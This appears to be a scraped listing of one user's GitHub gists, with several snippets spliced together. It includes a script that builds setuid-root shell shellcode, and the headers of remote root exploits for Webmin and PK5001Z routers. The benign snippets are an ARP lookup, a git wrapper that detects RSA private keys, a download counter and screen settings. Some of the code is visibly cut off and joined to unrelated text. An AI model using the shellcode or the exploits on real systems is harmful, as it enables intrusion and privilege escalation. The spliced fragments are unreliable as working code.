oxagast / nosecandy.c
Created January 20, 2016 23:04
nose candy
#include "stdio.h"
#include "string.h"
/*
 * Write the byte `was` to standard output as a single character.
 * `expected` is accepted for the caller's benefit but is never read here.
 */
void test_op(unsigned char was, unsigned char expected) {
    (void)expected;
    putchar(was);
}
int main(int argc, char *argv[]) {
if ((argc > 1) && (argc < 3)) {
char ui[10];
for (int uia=0; uia<6; uia++) {
ui[uia] = argv[1][uia];
# Hex-level find/replace on one line of stdin: the line is converted to a hex
# string, the first argument (hex to find) is replaced by the second argument
# (hex to insert), and the result is packed back into bytes and printed.
# The leading greedy (.*) means a single substitution is made, at the last
# place the pattern matches.
# NOTE(review): the match runs on the hex string, so it is not restricted to
# byte boundaries and can start on an odd nibble - confirm that is acceptable.
# NOTE(review): the first argument is compiled as a regular expression (qr//),
# not treated as a literal, and when nothing matches $newhex is never assigned,
# so nothing is printed.
echo AAAABCCCC | perl -e '$change = $ARGV[1]; $findme = $ARGV[0]; $let = <STDIN>; $hex = unpack("H*", $let); $reg = qr/$findme/; if ($hex =~ s/(.*)${reg}(.*)/\1$change\2/){$newhex = pack("H*", $hex);} print $newhex;' 414243 444546
oxagast / magicsquare.cpp
Last active June 30, 2016 16:37
magic square
// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)
// magic square
#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>
### godmode by oxagast ###
# Prints a C declaration of the form `char shellcode[] = "...";` built from the
# raw instruction bytes that objdump reports for a small helper program.
# The helper calls setuid(0) and then runs /bin/sh; setuid(0) only succeeds
# when the calling process already holds the privilege to change its UID, so
# the program does not raise privileges on its own.
# NOTE(review): `objdump -d` is run on the whole linked executable, so the
# bytes presumably include startup and linker-generated code as well as
# main() - verify what the output actually contains before relying on it.
# All working files (sc.c, godmode, s.tmp) use fixed names in the current
# directory and overwrite anything already there with those names.

# Write the two-line C source.
echo '#include <unistd.h>' > sc.c;
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
# Compile it to ./godmode.
gcc sc.c -o godmode;
# Disassemble, drop the "file format" banner, keep the text after the first
# ':', trim to the raw-byte column, put one byte per line, discard empty
# lines, prefix each byte with \x and join everything into a single string.
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" | cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n")
# Emit the declaration prefix without a trailing newline.
echo -n "char shellcode[] = "
# Wrap the byte string into quoted lines via s.tmp; `head -c -1` drops the
# final byte of the formatted output.
# NOTE(review): the second command re-processes the full string, so the 60
# characters written by the first command look like they are emitted twice -
# check the generated text.
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1
# Terminate the C statement.
echo ";";
# Remove the source and the binary; s.tmp is left behind.
rm sc.c godmode;
# Lists the hosts in the local ARP cache next to a vendor string looked up
# for each MAC address, and leaves the combined listing in ./resolved.
# Privacy note: every MAC address in the ARP cache is sent, one request per
# address, to a third-party website (adminsub.net).
# The parsing depends on the exact layout of `arp` output and of the HTML
# returned by that site - presumably fragile; verify before relying on it.
# Working files use fixed names in the current directory.

# Clear any result left over from a previous run.
rm page_part 2>/dev/null;
# Extract the MAC column from `arp`, fetch the lookup page for each address,
# and keep the lines around "Vendor" that contain "google".
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/ C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part;
# Cut the vendor text out of the saved HTML, then save the first column of
# `arp -n`. The first `arp -n` in the pipe is redundant: its output is fed to
# a second `arp -n`, which produces the listing by itself.
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac;
# Drop the first line (the column header) of the address list.
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2;
# Print both numbered lists and store them, one after the other, in ./resolved.
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved;
# Remove the intermediate files; ./resolved is kept.
rm ips_tomac ips_tomac2 macs_resolved page_part
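#!/bin/bash
# alias "git"='~/.git_check_rsa.sh'
#
# git wrapper: refuse to run git when any regular file below the current
# directory has a PEM RSA private-key header as its first line; otherwise
# pass every argument through to git unchanged.
#
# Scope: only the first line of each file is inspected and only the
# "BEGIN RSA PRIVATE KEY" header is recognised, so other key formats, or a
# key that starts further down a file, are not caught. The check runs for
# every git subcommand and scans from the directory the wrapper is started in.

# `-exec ... {} +` hands file names to head directly, so names containing
# whitespace are handled. With several files head prints "==> name <=="
# banners; anchoring the pattern at the start of the line keeps a banner from
# matching. `grep -a` treats the stream as text so a binary file elsewhere in
# the tree cannot hide a matching line, and any match (not just the first
# "BEGIN RSA" line seen) blocks the command.
if find . -type f -exec head -n 1 {} + 2>/dev/null |
    grep -aq -- '^-----BEGIN RSA PRIVATE KEY-----'; then
  echo RSA KEY FOUND!;
  echo Not adding to git.;
  exit 1;
else
  # Quoted "$@" keeps arguments with spaces (for example commit messages) intact.
  git "$@"
fi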
oxagast / github_rd.sh
Last active March 24, 2017 13:53
Get the total number of GitHub release downloads over all time for a project
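# Sum the download_count of every release asset the GitHub API reports for
# GITUSER/REPO and print the total.
# The figure is release-asset downloads, not repository clones.
# Only one page of releases is requested (per_page=100, the API maximum), so
# a project with more releases than that needs pagination for a full total.
REPO=ansvif
GITUSER=oxagast
# -f makes curl fail on an HTTP error (for example a rate-limit response)
# instead of passing the error body on to be counted as zero downloads.
if releases_json=$(curl -sf "https://api.github.com/repos/${GITUSER}/${REPO}/releases?per_page=100"); then
  # Each matching line looks like `"download_count": 12,`; strip the trailing
  # comma and add the number up. Prints 0 when there are no assets.
  total=$(printf '%s\n' "$releases_json" |
    awk -F': *' '/download_count/ { sub(/,.*/, "", $2); sum += $2 } END { printf "%d", sum }')
  echo "${total} All time release downloads of ${REPO}."
else
  echo "Could not fetch release data for ${GITUSER}/${REPO}." >&2
fi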
oxagast / wmsploit-remote-root-1.29-reprise.sh
Created April 26, 2017 11:10
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
oxagast / .screenrc
Last active April 27, 2017 20:36
Screen Settings
# GNU screen settings.
# Do not show the startup/copyright page.
startup_message off
# Idle lock is commented out, so with the lines shown here screen never locks
# an unattended session on its own.
#idle 1800 lockscreen
# Turn the visual bell off.
vbell off
# Show status messages for 2 seconds.
msgwait 2
# Keep 15000 lines of scrollback per new window. Anything printed to the
# terminal, including secrets, stays readable in that history.
defscrollback 15000
# New windows default to UTF-8.
defutf8 on
# Start bash in new windows.
shell bash
# Title for shell windows; presumably the "search|name" form, with "$ " as the
# prompt search string and "bash" as the default name - confirm in screen(1).
shelltitle "$ |bash"
# prefix + '/': clear the screen and shrink the scrollback to 0 before
# restoring it to 15000, which discards the window's stored history.
bind '/' eval "clear" "scrollback 0" "scrollback 15000"
# prefix + '=': make all regions the same size.
bind = resize =
oxagast / pk5001z00pin.c
Last active May 6, 2018 16:15
Remote root Exploit for PK5001Z CenturyLink Routers.
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */